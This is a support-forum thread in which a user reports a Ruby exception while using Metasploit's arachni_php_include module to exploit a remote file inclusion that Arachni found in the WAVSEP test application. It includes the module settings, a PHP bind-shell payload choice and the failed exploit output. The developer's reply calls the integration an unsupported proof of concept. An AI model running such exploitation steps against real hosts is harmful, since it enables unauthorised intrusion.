Got exception while using arachni_php_include msf plugin to exploit rfi vulnerability

Yanjin Ding's Avatar

Yanjin Ding

11 Jun, 2014 05:52 PM

Hi Tasos,

I ran arachni scan against WAVSEP(https://code.google.com/p/wavsep/), particularly the rfi section. And I got the metareport containing lots of rfi vulnerabilities. Then I loaded the metareport into metasploit, pick one vulnerability and try to use arachni_manual to exploit it.
But I got an exception: [-] Exploit failed: undefined method `remove_resource' for nil:NilClass. Is this a normal way of saying: cannot exploit? Or it's a unexpected ruby exception needs to debug?

Below is the output I got on the terminal:

msf exploit(arachni_php_include) > arachni_manual 5
[*] Using unix/webapp/arachni_php_include .
[*] Preparing datastore for 'Remote File Inclusion' vulnerability @ 10.1.10.129/wavsep/active/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp ...
SRVHOST => 127.0.0.1
SRVPORT => 14471
RHOST => 10.1.10.129
RPORT => 8080
LHOST => 127.0.0.1
LPORT => 6054
SSL => false
GET => target=XXinjectionXX
METHOD => GET
COOKIES => 
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::Accept-Encoding=gzip, deflate::User-Agent=Arachni/v0.4.7::Cookie=JSESSIONID=45D7412B51830B9CB7B5950196D162EE
PATH => /wavsep/active/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
[*] Done!
PAYLOAD => php/bind_php


msf exploit(arachni_php_include) > show options Module options (exploit/unix/webapp/arachni_php_include): Name Current Setting Required Description




COOKIES no Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.) GET target=XXinjectionXX no GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.) HEADERS Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::Accept-Encoding=gzip, deflate::User-Agent=Arachni/v0.4.7::Cookie=JSESSIONID=45D7412B51830B9CB7B5950196D162EE no Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.) PATH /wavsep/active/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp yes The path to the vulnerable script. POST no POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.) Proxies no Use a proxy chain RHOST 10.1.10.129 yes The target address RPORT 8080 yes The target port SRVHOST 127.0.0.1 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 14471 yes The local port to listen on. SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (php/bind_php): Name Current Setting Required Description



LPORT 6054 yes The listen port RHOST 10.1.10.129 no The target address
Exploit target:
Id Name



0 Automatic
msf exploit(arachni_php_include) > exploit [*] Using URL: http://127.0.0.1:14471/LiCArBFVeO [*] PHP include server started. [*] Started bind handler [*] Sending HTTP request for /wavsep/active/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp [-] Exploit failed: undefined method `remove_resource' for nil:NilClass
  1. Support Staff 1 Posted by Tasos Laskos on 11 Jun, 2014 05:57 PM

    Tasos Laskos's Avatar

    Hi there,

    As the relevant file already says:

    Please be warned that at the moment Metasploit integration is here as a proof-of-concept and is not officially supported nor a high priority.
    

    Cheers

  2. Tasos Laskos closed this discussion on 11 Jun, 2014 05:57 PM.

Comments are currently closed for this discussion. You can start a new one.

Keyboard shortcuts

Generic

? Show this help
ESC Blurs the current field

Comment Form

r Focus the comment reply box
^ + ↩ Submit the comment

You can use Command ⌘ instead of Control ^ on Mac